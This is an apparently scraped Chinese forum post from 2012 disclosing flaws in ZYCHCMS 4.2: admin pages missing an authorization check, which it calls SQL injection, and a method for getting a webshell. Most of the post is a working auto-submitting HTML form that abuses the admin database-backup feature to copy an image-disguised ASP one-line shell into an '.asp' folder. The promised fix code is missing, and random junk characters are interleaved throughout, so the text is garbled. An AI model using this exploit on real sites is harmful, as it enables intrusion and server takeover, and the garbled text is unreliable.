2 B5 c* k9 B; }2 {
: K _7 F" a7 A, c0 A
* F9 h! Y5 e. h/ ]; d( \/ k# W$ F' C. X( T; g1 ? C- Z: J
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
3 N6 }7 o B- j x# c+ Q0 _7 J( i2 e( j ①SQL注射漏洞. ?) [7 G- ?+ j6 ^$ A0 \, r8 X
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp7 \' `7 s( W7 P0 A, O4 n: y6 |5 M3 _
漏洞原因:未过滤
' o. S2 {' N `& | c% Z) W 漏洞代码:
; t4 V/ [7 Y" L1 H8 Z+ P G6 m" b 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。1 K4 l6 I# I" J1 I4 S+ j
修复方法:在文件开头加入代码
, {, m6 d9 r8 B, w; G$ y6 q- L + m- T6 f) Q w6 x) }8 b4 r) a
/ E# B; R5 |9 j' K+ d; }6 g
②后台拿WBSHELL H& p0 }( t- r% ^$ i+ E- p
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。7 y2 V u, l4 }6 N
这里在网上找了一个,改了下,将就着用。% H. U* L6 W2 y1 v
以下是代码本地提交代码) Y6 A7 Q! F3 U. I) ?
! J, \" H. f7 {/ s, A' l
3 V7 K- C7 Z7 T4 _<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>; z" k9 S/ \, [, T3 t: L$ H+ h! {8 O
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>* F3 N5 Q( K' q- i& e' ]( M
<tr>
. n2 s5 H% n$ ] t <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
& T7 S; a" c3 h/ [0 P2 O </tr>9 _ W9 {- D+ v: L, S; g
<tr>4 c4 H) V/ ]: D1 }7 S
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>; |) V$ V$ A0 W+ @
</span>
' ?2 Z* G$ f/ r1 ? <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >% @7 {- e$ c# g( U R) ?. r5 Z
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >2 ^9 ~$ w2 w; w2 L
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
" u: j# z& v/ m3 T <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
& L9 H' a% v6 R% ? <div align=”left”>" w% A' M3 X9 _ {4 |
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />/ j* @$ T) s' n1 B* g7 l% o
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
6 e2 w& i$ ^1 ^: S- S <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
# ]+ l7 h ]" U } </div></td>4 h9 m. c) w1 q. F- J& G/ p# i
</tr>
7 A V+ n$ J; L) ]6 g <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>1 b6 S; d' T" k) ]5 ]1 p* M' W( J* Y: C
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
# J! j4 G3 ^9 s, k; Z9 \3 T3 Y <td class=”td”><div align=”left”>2 y" R7 \$ x) i# O- ~2 F( h
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” /># \% E) ^' C% V: r5 G4 w
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
7 N1 J; }$ l, k2 Z. x' O" k( u- W </tr>
8 ^" t2 L0 V( _! F; e6 |1 ^ o0 Q0 G <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
( Y" }' N' S6 p* P# [5 O <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
3 ]! K, W4 i w6 ^" _( s4 F, S <td class=”td”><div align=”left”>7 P8 Z [6 E! W3 K/ n
<input type=”submit” value=”确定备份” class=”btn”
2 N' B* g! A% K# f/ }& x y1 X8 K </div></td>: d7 D0 l/ o, l; i) M
</tr>0 n; z5 J% @# }3 I5 A2 v
</table></td></tr></form>$ j" \. I Q/ s1 u. y _
</table>' ?! H% O5 r. f
</td>
9 G5 ?8 H7 q# K3 k4 M. d7 z </tr>
2 X9 X$ y. X$ r4 ` </table>3 u5 E. D' N) G8 V4 a# u. O
<script>
A* j* C1 h9 R: w, a3 \" }7 F( b document.all.add.submit();" j! [4 Q' o% f; `
</script>" b: t9 F2 u0 `. ^6 b
6 ^' k* B! C5 D' T' }
; S8 {) Y. w. O' O, r% S# e
1 o# k! t8 z( k. \# `6 R6 L0 _9 L. a& m4 s" ?
5 t4 ]: G K) A" I
/ T7 b' K+ C6 K* Z" f+ ?+ G2 Q- P% R6 ]( H
0 V, A! e' a* _6 ^: ^. K" p% W9 W2 h+ g h6 w7 O) J
2 g U& v+ Y# s |
发表于 2012-9-10 21:09:51
收藏
支持
反对